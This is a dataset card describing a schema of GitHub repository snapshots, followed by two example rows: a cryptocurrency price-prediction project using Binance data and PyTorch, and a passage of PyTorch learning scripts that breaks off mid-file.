Dataset schema (one row per repository):

| Field | Type | Statistics |
|-------|------|------------|
| repo_name | stringlengths | 5–114 |
| repo_url | stringlengths | 24–133 |
| snapshot_id | stringlengths | 40–40 |
| revision_id | stringlengths | 40–40 |
| directory_id | stringlengths | 40–40 |
| branch_name | stringclasses | 209 values |
| visit_date | timestamp[ns] | |
| revision_date | timestamp[ns] | |
| committer_date | timestamp[ns] | |
| github_id | int64 | 9.83k–683M |
| star_events_count | int64 | 0–22.6k |
| fork_events_count | int64 | 0–4.15k |
| gha_license_id | stringclasses | 17 values |
| gha_created_at | timestamp[ns] | |
| gha_updated_at | timestamp[ns] | |
| gha_pushed_at | timestamp[ns] | |
| gha_language | stringclasses | 115 values |
| files | listlengths | 1–13.2k |
| num_files | int64 | 1–13.2k |
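Records with this schema can be inspected programmatically. Below is a minimal sketch using the `datasets` library in streaming mode; the identifier `"some-org/some-dataset"` is a hypothetical placeholder, since the dataset's real name is not given here:

```python
# Minimal sketch of loading records with the schema above.
# Assumption: the data is published as a Hugging Face dataset;
# "some-org/some-dataset" is a hypothetical placeholder identifier.
from datasets import load_dataset

ds = load_dataset("some-org/some-dataset", split="train", streaming=True)

for record in ds.take(2):
    # Scalar metadata fields from the schema above.
    print(record["repo_name"], record["repo_url"], record["branch_name"])
    print("stars:", record["star_events_count"],
          "forks:", record["fork_events_count"])
    # `files` is a list of per-file dicts; `num_files` is its length.
    assert record["num_files"] == len(record["files"])
```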
Example row 1: `phimachine/bitman`

- repo_name: `phimachine/bitman`
- repo_url: https://github.com/phimachine/bitman
- snapshot_id: `3b9e0fb69335d534eed97855bd26dcf603e6abec`
- revision_id: `228beb7f49f9b0ffcbcf2945202af8f9bc3d74d8`
- directory_id: `344107eabc8f906d24e7e1f779ec176b6066984a`
- branch_name: `refs/heads/master`
- visit_date: 2022-05-31T06:12:34.968517
- revision_date: 2018-04-01T07:33:04
- committer_date: 2018-04-01T07:33:04
- github_id: null
- star_events_count: 0
- fork_events_count: 0
- gha_license_id: null
- gha_created_at: null
- gha_updated_at: null
- gha_pushed_at: null
- gha_language: null
- files: listed verbatim below
[ { "alpha_fraction": 0.7043478488922119, "alphanum_fraction": 0.782608687877655, "avg_line_length": 18.16666603088379, "blob_id": "26ba3058b6953ed0307da67ba5f2891e3dce3772", "content_id": "49d25dda5afb1a0a0eb0afd2c746fe530732c0e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 115, "license_type": "no_license", "max_line_length": 43, "num_lines": 6, "path": "/parameters.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "\nbatch_size=64\ntime_length=128\nhidden_size=64\ninput_size=9\n# the number of layers stacked in each unit\nnum_layers=8" }, { "alpha_fraction": 0.7932960987091064, "alphanum_fraction": 0.7932960987091064, "avg_line_length": 27.289474487304688, "blob_id": "d1e2bba6f09fe559154706e6cd135882cb9211aa", "content_id": "a429669599dbfede477ffcfb451b784b9fed580e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1074, "license_type": "no_license", "max_line_length": 82, "num_lines": 38, "path": "/README.md", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "## Introduction\n\nThis is an application that predicts the price of some cryptocurrency\nwith machine learning models.\n\nThe goal of this project is place automated bets to earn some money.\n\nThe purpose of this project is to familiarize myself with time series\nprediction with highly discontinuous, high dimensional inputs, which is\ngoing to be my work at Mayo Clinic this summer.\n\n## Modules\n### Bridge\nCommunicates with Binance API.\n\nBridge will get data from Binance for prediction.\n\nBridge will relay the model decision to Binance.\n\n### Pruner\nPruner takes in data from Bridge and prune them into PyTorch acceptable\nformats.\n\nPruner takes model decision output and pass it to API-compatible commands.\n\n### Model\nThis is the statistical model that takes in the pruned data and outputs decisions.\nThis will likely be a PyTorch model.\n\nWho knows? Maybe SVM or tree? Anything that makes money, right?\n\nMultiple models should be produced and selected for the best performance.\n\n\n### Trainer\n\nIf a neural network model is chosen, then Trainer will train the neural\nnetwork model." 
}, { "alpha_fraction": 0.532801628112793, "alphanum_fraction": 0.5798816680908203, "avg_line_length": 30.09600067138672, "blob_id": "67454d309aa184afc422baaad4d70b9c58bb2bd3", "content_id": "db577c2684553f7c1c0ec146d75a737293f5fc90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3887, "license_type": "no_license", "max_line_length": 114, "num_lines": 125, "path": "/br/bridge.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "from binance.client import Client\nfrom br.myapi import *\nimport pickle\nimport re\nimport os\nimport pathlib\n\ndef some_test():\n from_cache=True\n\n if from_cache==False:\n client = Client(api_key, api_secret)\n\n # get all symbol prices\n prices = client.get_all_tickers()\n\n # get market depth\n depth = client.get_order_book(symbol='BNBBTC')\n\n klines={}\n\n # fetch 1 minute klines for the last day up until now\n klines[\"1 day ago UTC, minute\"] = client.get_historical_klines(\n \"BNBBTC\", Client.KLINE_INTERVAL_1MINUTE, \"1 day ago UTC\")\n\n # fetch 30 minute klines for the last month of 2017\n klines[\"1 Dec, 2017 to 1 Jan, 2018, 30 minute\"] = client.get_historical_klines(\n \"ETHBTC\", Client.KLINE_INTERVAL_30MINUTE, \"1 Dec, 2017\", \"1 Jan, 2018\")\n\n # fetch weekly klines since it listed\n klines[\"1 Jan, 2017 to now, week\"] = client.get_historical_klines(\n \"NEOBTC\", Client.KLINE_INTERVAL_1WEEK, \"1 Jan, 2017\")\n\n # pickle them\n with open(\"klines.pkl\",\"wb\") as kline_pickle:\n pickle.dump(klines,kline_pickle)\n print('saved')\n\n else:\n with open(\"klines.pkl\",\"rb\") as kline_pickle:\n klines = pickle.load(kline_pickle)\n\n print('done')\n\n\nclass Bridge():\n def __init__(self):\n self.client = Client(api_key, api_secret)\n\n def get_prices(self):\n # get all symbol prices\n return self.client.get_all_tickers()\n\n def get_all_symbols(self):\n '''\n\n :param save:\n :return: a list of symbols string\n '''\n prices=self.get_prices()\n all_symbols=[i['symbol'] for i in prices]\n return all_symbols\n\n def get_klines(self, symbol, interval, start_str, end_str=None):\n\n '''\n :param symbol:\n :param interval:\n :param start_str:\n :param end_str:\n :return:\n\n Kline return value:\n\n 1499040000000, # Open time\n \"0.01634790\", # Open\n \"0.80000000\", # High\n \"0.01575800\", # Low\n \"0.01577100\", # Close\n \"148976.11427815\", # Volume\n 1499644799999, # Close time\n \"2434.19055334\", # Quote asset volume\n 308, # Number of trades\n \"1756.87402397\", # Taker buy base asset volume\n \"28.46694368\", # Taker buy quote asset volume\n \"17928899.62484339\" # Can be ignored\n\n Open, high, low and close are price values.\n Volume and number of trades are trade signatures.\n '''\n\n print (\"Getting \"+symbol+\" kline\")\n return self.client.get_historical_klines(symbol, interval, start_str, end_str)\n\n def get_file_name(self,btc_symbol,interval=\" 15 minute\"):\n if 'data' in str(pathlib.Path.cwd()):\n return \"btc_klines \" + btc_symbol + interval+ \".pkl\"\n else:\n return \"data/btc_klines \" + btc_symbol + interval+ \".pkl\"\n\n def get_btc_symbols(self):\n symbols = self.get_all_symbols()\n pattern = re.compile(\"^([A-Za-z])*BTC$\")\n btc_symbols = [i for i in symbols if pattern.match(i)]\n return btc_symbols\n\n def download_btc_klines(self, interval=Client.KLINE_INTERVAL_15MINUTE, start_str=\"1 May, 2017\", end_str=None):\n btc_symbols=self.get_btc_symbols()\n\n btc_klines = {}\n for btc_symbol in btc_symbols:\n 
filename=self.get_file_name(btc_symbol)\n\n if os.path.isfile(filename):\n with open(filename,'rb') as kline_pickle:\n print(filename+\" exists\")\n else:\n btc_klines[btc_symbol] = self.get_klines(btc_symbol, interval, start_str, end_str)\n with open(filename, \"wb\") as kline_pickle:\n pickle.dump(btc_klines, kline_pickle)\n\n\nif __name__==\"__main__\":\n bridge=Bridge()\n bridge.download_btc_klines()\n" }, { "alpha_fraction": 0.5865327715873718, "alphanum_fraction": 0.5912581086158752, "avg_line_length": 34.978721618652344, "blob_id": "abd7c1081b6acd186c3c05cd9bbea68c9178bcbb", "content_id": "7e8d1c45559ab78f0254eec04b932b1d805f7647", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1693, "license_type": "no_license", "max_line_length": 93, "num_lines": 47, "path": "/models/RMM.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn.modules.rnn import RNN\n\n\"\"\"\nThis is a recurrent network model.\nA RNN has a window of 1/4 of the total timestamps to learn the behavior of the curve.\nThat can be used to adjust the internal state of the RNN.\nAfter 1/4 of the total timestamps, the derivative starts to flow back and guide the training.\n\"\"\"\n\nclass RMM(nn.Module):\n '''\n RMM is a composite of RNN,\n with a dense network in the end\n '''\n\n def __init__(self,input_size, hidden_size, output_size,\n dense_layers_count=1, num_layers=1,\n bias=True,\n batch_first=False, dropout=0,\n bidirectional=False):\n super(RMM, self).__init__()\n self.output_size=output_size\n self.rnn=RNN(input_size=input_size,hidden_size=hidden_size,\n num_layers=num_layers,bias=bias,batch_first=batch_first,\n dropout=dropout,bidirectional=bidirectional)\n # of course, this is a critical line.\n self.dense_layers=nn.ModuleList()\n self.dense_layers_count=dense_layers_count\n\n try:\n for _ in range(self.dense_layers_count-1):\n self.dense_layers.append(nn.Linear(hidden_size,hidden_size))\n self.dense_layers.append(nn.Linear(hidden_size,output_size))\n except:\n raise\n\n def forward(self, input, hx=None):\n x, hidden_k=self.rnn(input,hx)\n for _ in range(self.dense_layers_count):\n try:\n x=self.dense_layers[_](x)\n except AttributeError:\n print(\"what the fuck\")\n raise\n return x\n\n\n" }, { "alpha_fraction": 0.8064516186714172, "alphanum_fraction": 0.8064516186714172, "avg_line_length": 14.75, "blob_id": "eb4c95ddefdb0326251fb9ef7bd85f8ae3d6a58b", "content_id": "4d1846a18e1a2a23b5f0628e7007017047d5d234", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/models/model.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "from parameters import *\nfrom models.RMM import RMM\n\nModel=RMM" }, { "alpha_fraction": 0.6143209934234619, "alphanum_fraction": 0.6259258985519409, "avg_line_length": 32.479339599609375, "blob_id": "b7f6b531172a9dc467d4368adef778a33caefeed", "content_id": "8bda9717c531a3aa1723c64e41ddc0fb42de5d38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4050, "license_type": "no_license", "max_line_length": 95, "num_lines": 121, "path": "/trainer/RNNtrainer.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "import pickle\nfrom models.model import Model\nfrom pr.pruner import Pruner\nfrom parameters import *\nfrom torch.nn.modules.loss 
import L1Loss\nfrom torch.optim import Adam\nfrom torch.autograd import Variable\nimport torch\nfrom pathlib import Path\nimport numpy\n\n# def train_one_batch(model, optimizer, criterion, input_sequence, price_targets):\n#\n# running_loss=0\n# # should this be called before each step?\n# optimizer.zero_grad()\n# output,hidden=model(input_sequence[:,0,:])\n#\n# for i in range(1,time_length//4):\n# # A window where the RNN adapts to the new sequence\n# # does not include end\n# # how is batch training handled this way?\n#\n# # I am hoping for [batch_size, output_size]\n# # and [batch_size, hidden_size] type of outputs\n# output,hidden=model(input_sequence[:,i,:],hidden)\n#\n# for i in range(time_length//4, time_length):\n# output,hidden=model(input_sequence[:,i,:],hidden)\n# # TODO need to verify that they are aligned\n# loss=criterion(output,price_targets[:,i])\n# loss.backward()\n# optimizer.step()\n# running_loss+=loss.data[0]\n# running_loss+= criterion(output, price_targets[:, i])\n# running_loss.backward()\n# optimizer.step()\n#\n# return running_loss.data[0]\n\ndef train_one_batch(model,optimizer, criterion, input_sequence, price_targets):\n\n running_loss=0\n output=model(input_sequence)\n\n # only outputs over time_length//4 will be considered\n # this has severe underflow problem.\n critical_output=output[time_length//4:]\n critical_price_targets=price_targets[time_length//4:]\n running_loss += criterion(critical_output,critical_price_targets)\n\n running_loss.backward()\n optimizer.step()\n\n return running_loss.data[0]\n\ndef train(model, criterion, optimizer, total_batches):\n\n running_loss = 0.0\n\n for batch_num in range(total_batches):\n data=pruner.get_batch(time_length,batch_size)\n\n # get the inputs\n inputs, labels = data\n\n # wrap them in Variable\n # inputs is a [64,128,9]\n # inputs=numpy.asarray(inputs)\n # labels=numpy.asarray(labels)\n # inputs=torch.from_numpy(inputs)\n # labels=torch.from_numpy(labels)\n # inputs, labels = Variable(inputs).cuda(), Variable(labels).cuda()\n #\n inputs=torch.Tensor(inputs)\n labels=torch.Tensor(labels)\n inputs=Variable(inputs).cuda()\n labels=Variable(labels).cuda()\n last_loss=train_one_batch(model,optimizer,criterion,inputs,labels)\n #\n #\n # # zero the parameter gradients\n # optimizer.zero_grad()\n #\n # # forward + backward + optimize\n # outputs = net(inputs)\n # loss = criterion(outputs, labels)\n # loss.backward()\n # optimizer.step()\n\n # print statistics\n print_frequency=10\n save_frequency=1000\n running_loss += last_loss\n if batch_num % print_frequency == print_frequency-1: # print every 2000 mini-batches\n print('[%5d] loss: %.3f' %\n (batch_num + 1, running_loss / print_frequency))\n running_loss = 0.0\n if batch_num% save_frequency==save_frequency-1:\n print(\"Saving state dict\")\n statedict_path=Path(\"trainer/state_dict_\"+str(batch_num)+\".pkl\")\n torch.save(model.state_dict(),statedict_path)\n print(\"Finished training\")\n\nif __name__==\"__main__\":\n pruner = Pruner()\n # pruner.reprepare()\n # batch_input = pruner.get_batch(time_length, batch_size)\n\n model = Model(input_size=input_size, hidden_size=hidden_size,\n output_size=1,\n dense_layers_count=3,\n num_layers=num_layers, bias=True, batch_first=True,\n dropout=1, bidirectional=False)\n model=model.cuda()\n total_batches = 12800\n\n criterion = L1Loss()\n criterion = criterion.cuda()\n optimizer = Adam(model.parameters())\n train(model,criterion,optimizer,total_batches)" }, { "alpha_fraction": 0.6847457885742188, "alphanum_fraction": 
0.68813556432724, "avg_line_length": 28.600000381469727, "blob_id": "614befba7d6c74f9e4e8e611863e76f20b135f42", "content_id": "39b9dc64f5e0c90c262d25f8de7f3ef76e2b3fce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 295, "license_type": "no_license", "max_line_length": 66, "num_lines": 10, "path": "/br/myapi.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "# so that I don't have to publish my binance api to github\n\nwith open(\"/home/jasonhu/Documents/binance2.api\",'r') as api_info:\n api_info.readline()\n api_key=api_info.readline().strip()\n api_info.readline()\n api_secret=api_info.readline().strip()\n\n# print(api_secret)\n# print(api_key)" }, { "alpha_fraction": 0.5252912640571594, "alphanum_fraction": 0.5603893399238586, "avg_line_length": 35.462364196777344, "blob_id": "cd8f4e4288dd0e7002a61ef37823bf7effc992d6", "content_id": "42b9476c525e8a8a331027023bb1bef86d5a15d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6781, "license_type": "no_license", "max_line_length": 120, "num_lines": 186, "path": "/pr/pruner.py", "repo_name": "phimachine/bitman", "src_encoding": "UTF-8", "text": "import pickle\nimport os\nfrom br.bridge import Bridge\nfrom pathlib import Path\nimport random\nfrom parameters import *\n\n'''\n Kline return value:\n\n 1499040000000, # Open time\n \"0.01634790\", # Open\n \"0.80000000\", # High\n \"0.01575800\", # Low\n \"0.01577100\", # Close\n \"148976.11427815\", # Volume\n 1499644799999, # Close time\n \"2434.19055334\", # Quote asset volume\n 308, # Number of trades\n \"1756.87402397\", # Taker buy base asset volume\n \"28.46694368\", # Taker buy quote asset volume\n \"17928899.62484339\" # Can be ignored\n\n Open, high, low and close are price values.\n Volume and number of trades are trade signatures.\n\n The network does not take open time as a part of the input.\n We need everything except for the open time, close time and the can be ignored.\n'''\n\nclass Pruner():\n\n def __init__(self):\n self.bridge=Bridge()\n\n def reprepare(self):\n '''\n rewrites all data\n :return:\n '''\n self.prune_and_save(overwrite=True)\n self.get_length_for_all_pairs(load=False,save=True)\n\n\n def prune_and_save(self, overwrite=False):\n\n '''\n Pruned value:\n\n \"0.01634790\", # Open\n \"0.80000000\", # High\n \"0.01575800\", # Low\n \"0.01577100\", # Close\n \"148976.11427815\", # Volume\n \"2434.19055334\", # Quote asset volume\n 308, # Number of trades\n \"1756.87402397\", # Taker buy base asset volume\n \"28.46694368\", # Taker buy quote asset volume\n '''\n for symbol_pair in self.bridge.get_btc_symbols():\n filename = self.bridge.get_file_name(symbol_pair)[:-4] + \" pruned.pkl\"\n print(filename)\n\n if os.path.isfile(filename) and overwrite == False:\n print('pruned file already exists, no overwrite')\n else:\n with open(self.bridge.get_file_name(symbol_pair),'rb') as pickle_file:\n print(\"starting pruning \"+symbol_pair)\n klines_list=pickle.load(pickle_file)\n pruned_klines_list=[]\n\n for kline in klines_list[symbol_pair]:\n kline.pop(0)\n kline.pop(5)\n kline.pop(-1)\n kline=list(map(float,kline))\n pruned_klines_list.append(kline)\n\n with open(filename,'wb') as pickle_save:\n pickle.dump(pruned_klines_list,pickle_save)\n\n\n def get_length_for_all_pairs(self, load=True, save=False):\n '''\n 128 tickers form up one unit of operation.\n shuffled and fed into the network by batches\n\n The dataset has many pairs of 
trades. To sample unbiasedly, we need to find out the\n length of each pair of trade and produce the starting point of the 128-slice.\n\n Can such slice be produced at runtime?\n Maybe, why not?\n :return:\n '''\n\n if \"pr\" in str(Path.cwd()):\n file_path=Path(\"pairs_and_lengths.pkl\")\n else:\n file_path=Path(\"pr/pairs_and_lengths.pkl\")\n if file_path.exists() and load:\n with file_path.open('rb') as pickle_file:\n return pickle.load(pickle_file)\n else:\n # keys are the symbol pairs, values is (number_of_ticks, path) tuple\n paired_lengths = {}\n if \"pr\" in str(Path.cwd()):\n data_dir_path=Path(\"../data\")\n else:\n data_dir_path=Path(\"data\")\n pruned_list=list(data_dir_path.glob(\"*pruned.pkl\"))\n for pruned in pruned_list:\n with pruned.open(\"rb\") as pickle_file:\n klines=pickle.load(pickle_file)\n number_of_ticks=len(klines)\n if number_of_ticks<time_length+1:\n print('the length of '+str(pruned)+\" is too small.\")\n else:\n filename_splitted=str(pruned).split()\n if \"pr\" in str(Path.cwd()):\n # if \"pr\" is in the path, then pruned will look like \"../data/abc.data\"\n # this line makes it so that the path looks like \"data/abc.data\"\n paired_lengths[filename_splitted[1]] = (number_of_ticks, Path(*pruned.parts[2:]))\n else:\n paired_lengths[filename_splitted[1]] = (number_of_ticks, pruned)\n if save:\n with file_path.open('wb') as pickle_file:\n pickle.dump(paired_lengths,pickle_file)\n return paired_lengths\n\n def get_ticker_marker(self,time_length,batch_size):\n '''\n return batch_size number of tuple (ticker starting position, file_path)\n\n :param time_length:\n :param batch_size:\n :return:\n '''\n if \"pr\" in str(Path.cwd()):\n pairs_lengths_path=Path(\"../pr/pairs_and_lengths.pkl\")\n else:\n pairs_lengths_path=Path(\"pr/pairs_and_lengths.pkl\")\n with pairs_lengths_path.open('rb') as lengths_file:\n paired_lengths=pickle.load(lengths_file)\n\n # first we sample a pair, by weights decided by lengths\n # then we sample a starting position, evenly\n\n number_of_tickers=[value[0] for value in paired_lengths.values()]\n count_path_tuples=list(paired_lengths.values())\n\n sampled_count_path_tuples = random.choices(population=count_path_tuples,weights=number_of_tickers, k=batch_size)\n double_sampled_count_path_tuples=[]\n\n for count_path_tuple in sampled_count_path_tuples:\n start_mark=random.randint(0,count_path_tuple[0]-time_length-1)\n double_sampled_count_path_tuples.append((start_mark,count_path_tuple[1]))\n\n return double_sampled_count_path_tuples\n\n def get_batch(self,time_length,batch_size):\n '''\n Create a batch of x and y\n y is the close price at the next time step\n\n opening file costs time. Consider, if memory permits, caching the read/write\n\n :param time_length:\n :param batch_size:\n :return:\n '''\n ticker_marker=self.get_ticker_marker(time_length,batch_size)\n x=[]\n y=[]\n for marker, path in ticker_marker:\n with path.open(\"rb\") as pickle_file:\n klines=pickle.load(pickle_file)\n x.append(klines[marker:marker+time_length])\n y.append([kline[3] for kline in klines[marker+1:marker+time_length+1]])\n\n return (x,y)\n\nif __name__==\"__main__\":\n pruner=Pruner()\n pruner.reprepare()\n hello=pruner.get_batch(time_length,batch_size)\n print(\"done\")" } ]
- num_files: 8
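Each entry in the `files` list pairs per-file metadata (`language`, `license_type`, `length_bytes`, `path`, `src_encoding`, and character-composition stats such as `alpha_fraction`) with the file's full `text`. The sketch below, under the assumption that `record` holds one parsed row shaped like the example above, filters a record down to its small Python sources:

```python
# Sketch: selecting Python sources from one record's `files` list.
# Assumption: `record` is a dict shaped like the example row above.
def python_sources(record, max_bytes=10_000):
    """Yield (path, text) for Python files under a size cutoff."""
    for f in record["files"]:
        if f["language"] == "Python" and f["length_bytes"] <= max_bytes:
            yield f["path"], f["text"]

# Example usage: print each qualifying file's path and first line.
# for path, text in python_sources(record):
#     print(path, "->", text.splitlines()[0] if text else "<empty>")
```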
Example row 2: `pengpengda123/NlpLearning`

- repo_name: `pengpengda123/NlpLearning`
- repo_url: https://github.com/pengpengda123/NlpLearning
- snapshot_id: `5d7d4ff000a91a6eda52ba1b339f0bf5fce6394f`
- revision_id: `d09e44fe712e374b3499a8df33816ecd169b15d7`
- directory_id: `c57546d88b1f0447ab5ac0b14975735803e82359`
- branch_name: `refs/heads/master`
- visit_date: 2020-06-14T17:49:38.182163
- revision_date: 2019-07-10T03:06:44
- committer_date: 2019-07-10T03:06:44
- github_id: 195077183
- star_events_count: 0
- fork_events_count: 0
- gha_license_id: null
- gha_created_at: null
- gha_updated_at: null
- gha_pushed_at: null
- gha_language: null
- files: listed verbatim below
[ { "alpha_fraction": 0.5214446783065796, "alphanum_fraction": 0.555304765701294, "avg_line_length": 27.913043975830078, "blob_id": "68b6acd3a41f17f5644e1557fa2792040061c73c", "content_id": "a925d3336caf984a2249133d9af9dbb24e27f603", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1347, "license_type": "no_license", "max_line_length": 68, "num_lines": 46, "path": "/worktest/load_alldata.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "# author:tanzhang\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch\nimport os\nimport time\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport numpy as np\ndef loaddata(from_path,save_path):\n # get data\n data = open(from_path, 'r', encoding='utf_8').read().split('\\n')\n # get first 5 sentence\n # get middle 10 sentence\n # get last 5 sentence\n d_f = open(save_path,'w',encoding='utf_8')\n count_1 = 15\n count_2 = 20\n count_3 = 15\n\n for line in data:\n line = line.replace('\\t',' ')\n line = line.split(' ')\n totalcount = len(line) # 当前行内总句子数目\n tdata = line\n if totalcount > (count_1+count_2+count_3+1):\n # first 25% second 50 last 25\n index_1 = 0\n index_2 = int(totalcount/2)\n index_3 = int(totalcount*0.75)\n print(line[index_1:count_1])\n print(line[index_2:count_2])\n print(line[index_3:count_3])\n first = line[index_1:count_1]\n first+=line[index_2:count_2]\n first+=line[index_3:count_3]\n tdata = first\n print(tdata)\n break\n for i in tdata:\n d_f.write(i)\n d_f.write(' ')\n d_f.write('\\n')\n\nif __name__=='__main__':\n loaddata('alldata_iron.tsv','alldata_iron_save.tsv')" }, { "alpha_fraction": 0.5815727710723877, "alphanum_fraction": 0.6214788556098938, "avg_line_length": 28.13675308227539, "blob_id": "41262802cf3738654aaa89d2a10df738f9469716", "content_id": "84d4262bd3f258870a5e759513c22f12c554e2fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3934, "license_type": "no_license", "max_line_length": 80, "num_lines": 117, "path": "/natualnet/demo_part2.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "# author:tanzhang\nimport torch\nimport numpy as np\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\nimport matplotlib.pyplot as plt\n# %matplotlib inline\ndef plot_decision_boundary(model, x, y):\n # Set min and max values and give it some padding\n x_min, x_max = x[:, 0].min() - 1, x[:, 0].max() + 1\n y_min, y_max = x[:, 1].min() - 1, x[:, 1].max() + 1\n h = 0.01\n # Generate a grid of points with distance h between them\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n # Predict the function value for the whole grid\n Z = model(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n # Plot the contour and training examples\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral)\n plt.ylabel('x2')\n plt.xlabel('x1')\n plt.scatter(x[:, 0], x[:, 1], c=y.reshape(-1), s=40, cmap=plt.cm.Spectral)\nprint('start......')\nnp.random.seed(1)\nm = 400 # 样本数量\nN = int(m/2) # 每一类的点的个数 200\nD = 2 # 维度\nx = np.zeros((m, D))\n# print(x.shape) # 400 2\ny = np.zeros((m, 1), dtype='uint8') # label 向量,0 表示红色,1 表示蓝色\n# print(y.shape) # 400 1\na = 4\n\nfor j in range(2):\n ix = range(N*j,N*(j+1)) # 0-200;200-400\n t = np.linspace(j*3.12,(j+1)*3.12,N) + np.random.randn(N)*0.2 # theta\n r = a*np.sin(4*t) + np.random.randn(N)*0.2 # radius\n x[ix] = np.c_[r*np.sin(t), r*np.cos(t)]\n 
y[ix] = j\nplt.scatter(x[:, 0], x[:, 1], c=y.reshape(-1), s=40, cmap=plt.cm.Spectral)\n'''\nPyTorch 中的模块,Sequential 和 Module。Sequential 允许我们构建序列化的模块,\n而 Module 是一种更加灵活的模型定义方式,我们下面分别用 Sequential 和 Module 来定义上面的神经网络。\n'''\n# trans x and y to Tensor from type of numpy.ndarray\nx = torch.from_numpy(x).float()\ny = torch.from_numpy(y).float()\n# Sequential\nseq_net = nn.Sequential(\n nn.Linear(2, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 10), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(10, 4), # PyTorch 中的线性层,wx + b\n nn.Tanh(),\n nn.Linear(4, 1)\n)\n# 序列模块可以通过索引访问每一层\nseq_net[0] # 第一层\n# 打印出第一层的权重\nw0 = seq_net[2].weight\n# hello\n# 通过 parameters 可以取得模型的参数\nparam = seq_net.parameters()\n# 定义损失函数\ncriterion = nn.BCEWithLogitsLoss()\n# 定义优化器\noptim = torch.optim.SGD(param, 1.)\n\n# 我们训练 10000 次\nfor e in range(10000):\n out = seq_net(Variable(x))\n loss = criterion(out, Variable(y))\n optim.zero_grad()\n loss.backward()\n optim.step()\n if (e + 1) % 1000 == 0:\n print('epoch: {}, loss: {}'.format(e+1, loss))\n# 定义两层神经网络的参数\n\ndef plot_seq(x):\n out = F.sigmoid(seq_net(Variable(torch.from_numpy(x).float()))).data.numpy()\n out = (out > 0.5) * 1\n return out\nplot_decision_boundary(lambda x: plot_seq(x), x.numpy(), y.numpy())\nplt.title('sequential')\nplt.show()\n\n# 模型的保存and读取操作\n# 将参数和模型保存在一起\ntorch.save(seq_net, 'save_seq_net.pth')\n# 读取保存的模型\nseq_net1 = torch.load('save_seq_net.pth')\n\n# 下面我们看看第二种保存模型的方式,只保存参数而不保存模型结构\n# 保存模型参数\ntorch.save(seq_net.state_dict(), 'save_seq_net_params.pth')\nseq_net2 = nn.Sequential(\n nn.Linear(2, 4),\n nn.Tanh(),\n nn.Linear(4, 1)\n)\nseq_net2.load_state_dict(torch.load('save_seq_net_params.pth'))" }, { "alpha_fraction": 0.5709658265113831, "alphanum_fraction": 0.6157243847846985, "avg_line_length": 28.798246383666992, "blob_id": "ff0152f7a70a63699131b9ddee8c525aadd567b1", "content_id": "724b47a628417cd4b6f1e224631982fd5f4ebf21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3522, "license_type": "no_license", "max_line_length": 105, "num_lines": 114, "path": "/natualnet/demo.py", "repo_name": "pengpengda123/NlpLearning", "src_encoding": "UTF-8", "text": "# author tanzhang\nimport torch\nimport numpy as np\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\nimport matplotlib.pyplot as plt\n# %matplotlib inline\ndef plot_decision_boundary(model, x, y):\n # Set min and max values and give it some padding\n x_min, x_max = x[:, 0].min() - 1, x[:, 0].max() + 1\n y_min, y_max = x[:, 1].min() - 1, x[:, 1].max() + 1\n h = 0.01\n # Generate a grid of points with distance h between them\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n # Predict the function value for the whole grid\n Z = model(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n # Plot the contour and training examples\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral)\n plt.ylabel('x2')\n plt.xlabel('x1')\n plt.scatter(x[:, 0], x[:, 1], c=y.reshape(-1), s=40, cmap=plt.cm.Spectral)\nprint('start......')\nnp.random.seed(1)\nm = 400 # 样本数量\nN = int(m/2) # 每一类的点的个数 200\nD = 2 # 维度\nx = np.zeros((m, D))\n# 
